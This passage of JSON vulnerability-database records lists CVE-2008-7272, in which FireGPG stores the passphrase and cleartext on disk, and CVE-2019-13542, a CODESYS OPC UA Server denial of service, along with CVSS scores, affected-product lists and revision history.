{"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 6, "enchantments": {"dependencies": {"modified": "2020-11-29T22:56:16", "references": [], "rev": 2}, "score": {"modified": "2020-11-29T22:56:16", "rev": 2, "value": 2.4, "vector": "NONE"}}, "hash": "20ae55db346f6babbeac989b07a5b26e855e45e42cfda6773d64bbcb84e4ef79", "hashmap": [{"hash": "d647e62c83e294ffd6f56a7c761beece", "key": "affectedSoftware"}, {"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "3c75b36a7f1966a251dbe6148b866f97", "key": "modified"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "675695b80d1f3d2196a77047e1ceba64", "key": "cpeConfiguration"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "cd391b15e7a01ae2bbfcca256d89bfb8", "key": "cvss3"}, {"hash": "95669953499c0eb40b242611dfbe75d4", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "lastseen": "2020-11-29T22:56:16", "modified": "2020-02-10T21:16:00", "objectVersion": "1.3", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 15}, "differentElements": ["affectedSoftware"], "edition": 6, "lastseen": "2020-11-29T22:56:16"}], "edition": 9, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "a0acab3127efc281e78e28b6a414532c"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpeConfiguration", "hash": "77e03828e2d6f83f8fa932acfe8daff3"}, {"key": "cvelist", "hash": "767e67f900c3effb5b550959d21fb12e"}, {"key": "cvss", "hash": "a89198c45ce87f7ec9735a085150b708"}, {"key": "cvss2", "hash": "9bc143c7676b7e5a3fd9537d7507310b"}, {"key": "cvss3", "hash": "cd391b15e7a01ae2bbfcca256d89bfb8"}, {"key": "cwe", "hash": "92c16862fafe4d9eb26185434339836e"}, {"key": "description", "hash": "95669953499c0eb40b242611dfbe75d4"}, {"key": "extraReferences", "hash": "4847e3110691b6a6a4c7664c0f127f70"}, {"key": "href", "hash": "9258b012e591cc93a7c6b0cd1b5c6b05"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "3c75b36a7f1966a251dbe6148b866f97"}, {"key": "published", "hash": "1162e82aa1c980ee7ebee4af4c99369c"}, {"key": "references", "hash": "54b0c94164bf625d039c58f14cd4c116"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "5db042f8057f3f288fe9cd4213121eb2"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "f34f5d089606f7d870ccc28642bf61f774619d905673726848fc15f3a6590575", "viewCount": 25, "enchantments": {"dependencies": {"references": [], "modified": "2021-04-21T20:41:43", "rev": 2}, "score": {"value": 2.4, "vector": "NONE", "modified": "2021-04-21T20:41:43", "rev": 2}}, "objectVersion": "1.5", "cpe": [], "affectedSoftware": [{"cpeName": "getfiregpg:firegpg", "name": "getfiregpg firegpg", "operator": "lt", "version": "0.6"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cpe23": [], "cwe": ["CWE-312"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:firegpg:0.6:*:*:*:*:firefox:*:*", "cpe_name": [], "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://security-tracker.debian.org/tracker/CVE-2008-7272", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://security-tracker.debian.org/tracker/CVE-2008-7272"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"}, {"name": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "refsource": "MISC", "tags": ["Third Party Advisory", "Issue Tracking"], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386"}], "immutableFields": []}, {"id": "CVE-2019-13542", "bulletinFamily": "NVD", "title": "CVE-2019-13542", "description": "3S-Smart Software Solutions GmbH CODESYS V3 OPC UA Server, all versions 3.5.11.0 to 3.5.15.0, allows an attacker to send crafted requests from a trusted OPC UA client that cause a NULL pointer dereference, which may trigger a denial-of-service condition.", "published": "2019-09-17T19:15:00", "modified": "2019-10-09T23:46:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13542", "reporter": "ics-cert@hq.dhs.gov", "references": ["https://www.us-cert.gov/ics/advisories/icsa-19-255-04"], "cvelist": ["CVE-2019-13542"], "type": "cve", "lastseen": "2021-04-23T00:45:10", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "codesys:linux", "name": "codesys linux", "operator": "lt", "version": "3.5.15.0"}, {"cpeName": "codesys:control_for_pfc100", "name": "codesys control for pfc100", "operator": "lt", "version": "3.5.15.0"}, {"cpeName": "codesys:control_for_beaglebone", "name": "codesys control for beaglebone", "operator": "lt", "version": "3.5.15.0"}, {"cpeName": "codesys:control_win", "name": "codesys control win", "operator": "lt", "version": "3.5.15.0"}, {"cpeName": "codesys:runtime_system_toolkit", "name": "codesys runtime system toolkit", "operator": "lt", "version": "3.5.15.0"}, {"cpeName": "codesys:control_for_raspberry_pi", "name": "codesys control for raspberry pi", "operator": "lt", "version": "3.5.15.0"}, {"cpeName": "codesys:control_for_pfc200", "name": "codesys control for pfc200", "operator": "lt", "version": "3.5.15.0"}, {"cpeName": "codesys:control_for_empc-a\\/imx6", "name": "codesys control for empc-a\\/imx6", "operator": "lt", "version": "3.5.15.0"}, {"cpeName": "codesys:control_for_iot2000", "name": "codesys control for iot2000", "operator": "lt", "version": "3.5.15.0"}, {"cpeName": "codesys:control_rte", "name": "codesys control rte", "operator": "lt", "version": "3.5.15.0"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:codesys:linux:3.5.15.0:*:*:*:*:*:*:*", "versionEndExcluding": "3.5.15.0", "versionStartIncluding": "3.5.11.0", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:codesys:control_for_empc-a\\/imx6:3.5.15.0:*:*:*:*:*:*:*", "versionEndExcluding": "3.5.15.0", "versionStartIncluding": "3.5.11.0", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:codesys:control_for_raspberry_pi:3.5.15.0:*:*:*:*:*:*:*", "versionEndExcluding": "3.5.15.0", "versionStartIncluding": "3.5.11.0", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:codesys:control_for_iot2000:3.5.15.0:*:*:*:*:*:*:*", "versionEndExcluding": "3.5.15.0", "versionStartIncluding": "3.5.11.0", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:codesys:control_for_beaglebone:3.5.15.0:*:*:*:*:*:*:*", "versionEndExcluding": "3.5.15.0", "versionStartIncluding": "3.5.11.0", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:codesys:control_for_pfc200:3.5.15.0:*:*:*:*:*:*:*", "versionEndExcluding": "3.5.15.0", "versionStartIncluding": "3.5.11.0", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:codesys:control_for_pfc100:3.5.15.0:*:*:*:*:*:*:*", "versionEndExcluding": "3.5.15.0", "versionStartIncluding": "3.5.11.0", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:codesys:control_rte:3.5.15.0:*:*:*:*:*:*:*", "versionEndExcluding": "3.5.15.0", "versionStartIncluding": "3.5.11.0", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:codesys:control_win:3.5.15.0:*:*:*:*:*:*:*", "versionEndExcluding": "3.5.15.0", "versionStartIncluding": "3.5.11.0", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:codesys:runtime_system_toolkit:3.5.15.0:*:*:*:*:*:*:*", "versionEndExcluding": "3.5.15.0", "versionStartIncluding": "3.5.11.0", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2019-13542"], "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 4.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, "cwe": ["CWE-476"], "description": "3S-Smart Software Solutions GmbH CODESYS V3 OPC UA Server, all versions 3.5.11.0 to 3.5.15.0, allows an attacker to send crafted requests from a trusted OPC UA client that cause a NULL pointer dereference, which may trigger a denial-of-service condition.", "edition": 8, "enchantments": {"dependencies": {"modified": "2021-02-02T07:12:50", "references": [{"idList": ["ICSA-19-255-04"], "type": "ics"}], "rev": 2}, "score": {"modified": "2021-02-02T07:12:50", "rev": 2, "value": 5.4, "vector": "NONE"}}, "extraReferences": [{"name": "https://www.us-cert.gov/ics/advisories/icsa-19-255-04", "refsource": "MISC", "tags": ["Third Party Advisory", "US Government Resource"], "url": "https://www.us-cert.gov/ics/advisories/icsa-19-255-04"}], "hash": "67961534e82863bb285ae4c3113d2fc3b78eaac0ec90b9e37717a4bfaa1ad873", "hashmap": [{"hash": "33ed16df6c59769dd4ad7c0a6c5063d0", "key": "description"}, {"hash": "fca7a4b9b23a8d0591b73bd319a9d0f1", "key": "extraReferences"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "f10299951f918c711504010cb77b610e", "key": "cwe"}, {"hash": "24f0ec5bc9e1f2aa209e1d4d29528d44", "key": "references"}, {"hash": "f69b9fcef9ab6a45e2cc456c2c83e88e", "key": "modified"}, {"hash": "3a24dfd360218a9ca36afb3843751b95", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "72939b299baa631da682814c53249d49", "key": "title"}, {"hash": "23cf199738e1a8bfeb155dee12c3b681", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "9118f7637f69cf6d5c50675abb7a2f89", "key": "cvelist"}, {"hash": "60856010ab022ddc5eb989281784c6c1", "key": "affectedSoftware"}, {"hash": "2ce83d7ed60b8fab569a92adb1479441", "key": "published"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "97648f682d0b3cc49c9db51b91556bde", "key": "cvss2"}, {"hash": "d0dd5cb02e5f524bf70d4906d5875205", "key": "cpeConfiguration"}, {"hash": "b70edea30079f317c31f12f39bb7a203", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13542", "id": "CVE-2019-13542", "immutableFields": [], "lastseen": "2021-02-02T07:12:50", "modified": "2019-10-09T23:46:00", "objectVersion": "1.5", "published": "2019-09-17T19:15:00", "references": ["https://www.us-cert.gov/ics/advisories/icsa-19-255-04"], "reporter": "cve@mitre.org", "title": "CVE-2019-13542", "type": "cve", "viewCount": 41}, "different_elements": ["reporter", "cpeConfiguration"], "edition": 8, "lastseen": "2021-02-02T07:12:50"}, {"bulletin": {"affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cvelist": ["CVE-2019-13542"], "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 4.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-476"], "description": "3S-Smart Software Solutions GmbH CODESYS V3 OPC UA Server, all versions 3.5.11.0 to 3.5.15.0, allows an attacker to send crafted requests from a trusted OPC UA client that cause a NULL pointer dereference, which may trigger a denial-of-service condition.", "edition": 2, "enchantments": {"dependencies": {"modified": "2019-09-19T11:03:11", "references": [{"idList": ["ICSA-19-255-04"], "type": "ics"}]}, "score": {"modified": "2019-09-19T11:03:11", "value": 5.4, "vector": "NONE"}}, "hash": "64e60322d0a722ee975c5b911e33482e96395b33676ab3bf9820456c939ece58", "hashmap": [{"hash": "33ed16df6c59769dd4ad7c0a6c5063d0", "key": "description"}, {"hash": "f10299951f918c711504010cb77b610e", "key": "cwe"}, {"hash": "24f0ec5bc9e1f2aa209e1d4d29528d44", "key": "references"}, {"hash": "e02210e4c936d342299b9a9c6450429e", "key": "modified"}, {"hash": "3a24dfd360218a9ca36afb3843751b95", "key": "cvss"}, {"hash": "72939b299baa631da682814c53249d49", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "9118f7637f69cf6d5c50675abb7a2f89", "key": "cvelist"}, {"hash": "2ce83d7ed60b8fab569a92adb1479441", "key": "published"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "97648f682d0b3cc49c9db51b91556bde", "key": "cvss2"}, {"hash": "b70edea30079f317c31f12f39bb7a203", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13542", "id": "CVE-2019-13542", "lastseen": "2019-09-19T11:03:11", "modified": "2019-09-18T19:22:00", "objectVersion": "1.3", "published": "2019-09-17T19:15:00", "references": ["https://www.us-cert.gov/ics/advisories/icsa-19-255-04"], "reporter": "cve@mitre.org", "title": "CVE-2019-13542", "type": "cve", "viewCount": 38}, "differentElements": ["modified"], "edition": 2, "lastseen": "2019-09-19T11:03:11"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "codesys:linux", "name": "codesys linux", "operator": "lt", "version": "3.5.15.0"}, {"cpeName": "codesys:control_for_pfc100", "name": "codesys control for pfc100", "operator": "lt", "version": "3.5.15.0"}, {"cpeName": "codesys:control_for_beaglebone", "name": "codesys control for beaglebone", "operator": "lt", "version": "3.5.15.0"}, {"cpeName": "codesys:control_win", "name": "codesys control win", "operator": "lt", "version": "3.5.15.0"}, {"cpeName": "codesys:runtime_system_toolkit", "name": "codesys runtime system toolkit", "operator": "lt", "version": "3.5.15.0"}, {"cpeName": "codesys:control_for_raspberry_pi", "name": "codesys control for raspberry pi", "operator": "lt", "version": "3.5.15.0"}, {"cpeName": "codesys:control_for_pfc200", "name": "codesys control for pfc200", "operator": "lt", "version": "3.5.15.0"}, {"cpeName": "codesys:control_for_empc-a\\/imx6", "name": "codesys control for empc-a\\/imx6", "operator": "lt", "version": "3.5.15.0"}, {"cpeName": "codesys:control_for_iot2000", "name": "codesys control for iot2000", "operator": "lt", "version": "3.5.15.0"}, {"cpeName": "codesys:control_rte", "name": "codesys control rte", "operator": "lt", "version": "3.5.15.0"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:codesys:linux:3.5.15.0:*:*:*:*:*:*:*", "versionEndExcluding": "3.5.15.0", "versionStartIncluding": "3.5.11.0", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:codesys:control_for_empc-a\\/imx6:3.5.15.0:*:*:*:*:*:*:*", "versionEndExcluding": "3.5.15.0", "versionStartIncluding": "3.5.11.0", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:codesys:control_for_raspberry_pi:3.5.15.0:*:*:*:*:*:*:*", "versionEndExcluding": "3.5.15.0", "versionStartIncluding": "3.5.11.0", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:codesys:control_for_iot2000:3.5.15.0:*:*:*:*:*:*:*", "versionEndExcluding": "3.5.15.0", "versionStartIncluding": "3.5.11.0", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:codesys:control_for_beaglebone:3.5.15.0:*:*:*:*:*:*:*", "versionEndExcluding": "3.5.15.0", "versionStartIncluding": "3.5.11.0", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:codesys:control_for_pfc200:3.5.15.0:*:*:*:*:*:*:*", "versionEndExcluding": "3.5.15.0", "versionStartIncluding": "3.5.11.0", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:codesys:control_for_pfc100:3.5.15.0:*:*:*:*:*:*:*", "versionEndExcluding": "3.5.15.0", "versionStartIncluding": "3.5.11.0", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:codesys:control_rte:3.5.15.0:*:*:*:*:*:*:*", "versionEndExcluding": "3.5.15.0", "versionStartIncluding": "3.5.11.0", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:codesys:control_win:3.5.15.0:*:*:*:*:*:*:*", "versionEndExcluding": "3.5.15.0", "versionStartIncluding": "3.5.11.0", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:codesys:runtime_system_toolkit:3.5.15.0:*:*:*:*:*:*:*", "versionEndExcluding": "3.5.15.0", "versionStartIncluding": "3.5.11.0", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2019-13542"], "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 4.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, "cwe": ["CWE-476"], "description": "3S-Smart Software Solutions GmbH CODESYS V3 OPC UA Server, all versions 3.5.11.0 to 3.5.15.0, allows an attacker to send crafted requests from a trusted OPC UA client that cause a NULL pointer dereference, which may trigger a denial-of-service condition.", "edition": 7, "enchantments": {"dependencies": {"modified": "2020-12-09T21:41:42", "references": [{"idList": ["ICSA-19-255-04"], "type": "ics"}], "rev": 2}, "score": {"modified": "2020-12-09T21:41:42", "rev": 2, "value": 5.4, "vector": "NONE"}}, "extraReferences": [], "hash": "c615bbe48df557b3dbc1cbd0f29b5ba350ed0bd4016f811182eb9c45c39245a4", "hashmap": [{"hash": "33ed16df6c59769dd4ad7c0a6c5063d0", "key": "description"}, {"hash": "f10299951f918c711504010cb77b610e", "key": "cwe"}, {"hash": "24f0ec5bc9e1f2aa209e1d4d29528d44", "key": "references"}, {"hash": "f69b9fcef9ab6a45e2cc456c2c83e88e", "key": "modified"}, {"hash": "3a24dfd360218a9ca36afb3843751b95", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "72939b299baa631da682814c53249d49", "key": "title"}, {"hash": "23cf199738e1a8bfeb155dee12c3b681", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "9118f7637f69cf6d5c50675abb7a2f89", "key": "cvelist"}, {"hash": "60856010ab022ddc5eb989281784c6c1", "key": "affectedSoftware"}, {"hash": "2ce83d7ed60b8fab569a92adb1479441", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "97648f682d0b3cc49c9db51b91556bde", "key": "cvss2"}, {"hash": "d0dd5cb02e5f524bf70d4906d5875205", "key": "cpeConfiguration"}, {"hash": "b70edea30079f317c31f12f39bb7a203", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13542", "id": "CVE-2019-13542", "lastseen": "2020-12-09T21:41:42", "modified": "2019-10-09T23:46:00", "objectVersion": "1.3", "published": "2019-09-17T19:15:00", "references": ["https://www.us-cert.gov/ics/advisories/icsa-19-255-04"], "reporter": "cve@mitre.org", "title": "CVE-2019-13542", "type": "cve", "viewCount": 40}, "differentElements": ["extraReferences"], "edition": 7, "lastseen": "2020-12-09T21:41:42"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "codesys:linux", "name": "codesys linux", "operator": "lt", "version": "3.5.15.0"}, {"cpeName": "codesys:control_for_pfc100", "name": "codesys control for pfc100", "operator": "lt", "version": "3.5.15.0"}, {"cpeName": "codesys:control_for_beaglebone", "name": "codesys control for beaglebone", "operator": "lt", "version": "3.5.15.0"}, {"cpeName": "codesys:control_win", "name": "codesys control win", "operator": "lt", "version": "3.5.15.0"}, {"cpeName": "codesys:runtime_system_toolkit", "name": "codesys runtime system toolkit", "operator": "lt", "version": "3.5.15.0"}, {"cpeName": "codesys:control_for_raspberry_pi", "name": "codesys control for raspberry pi", "operator": "lt", "version": "3.5.15.0"}, {"cpeName": "codesys:control_for_pfc200", "name": "codesys control for pfc200", "operator": "lt", "version": "3.5.15.0"}, {"cpeName": "codesys:control_for_empc-a\\/imx6", "name": "codesys control for empc-a\\/imx6", "operator": "lt", "version": "3.5.15.0"}, {"cpeName": "codesys:control_for_iot2000", "name": "codesys control for iot2000", "operator": "lt", "version": "3.5.15.0"}, {"cpeName": "codesys:control_rte", "name": "codesys control rte", "operator": "lt", "version": "3.5.15.0"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {}, "cvelist": ["CVE-2019-13542"], "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 4.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, "cwe": ["CWE-476"], "description": "3S-Smart Software Solutions GmbH CODESYS V3 OPC UA Server, all versions 3.5.11.0 to 3.5.15.0, allows an attacker to send crafted requests from a trusted OPC UA client that cause a NULL pointer dereference, which may trigger a denial-of-service condition.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-09-21T14:54:49", "references": [{"idList": ["ICSA-19-255-04"], "type": "ics"}], "rev": 2}, "score": {"modified": "2020-09-21T14:54:49", "rev": 2, "value": 5.4, "vector": "NONE"}}, "hash": "f55b0da91134662f688dd45ac864df6c8be70e28477ae3e92305158e83768ace", "hashmap": [{"hash": "33ed16df6c59769dd4ad7c0a6c5063d0", "key": "description"}, {"hash": "f10299951f918c711504010cb77b610e", "key": "cwe"}, {"hash": "24f0ec5bc9e1f2aa209e1d4d29528d44", "key": "references"}, {"hash": "f69b9fcef9ab6a45e2cc456c2c83e88e", "key": "modified"}, {"hash": "3a24dfd360218a9ca36afb3843751b95", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": 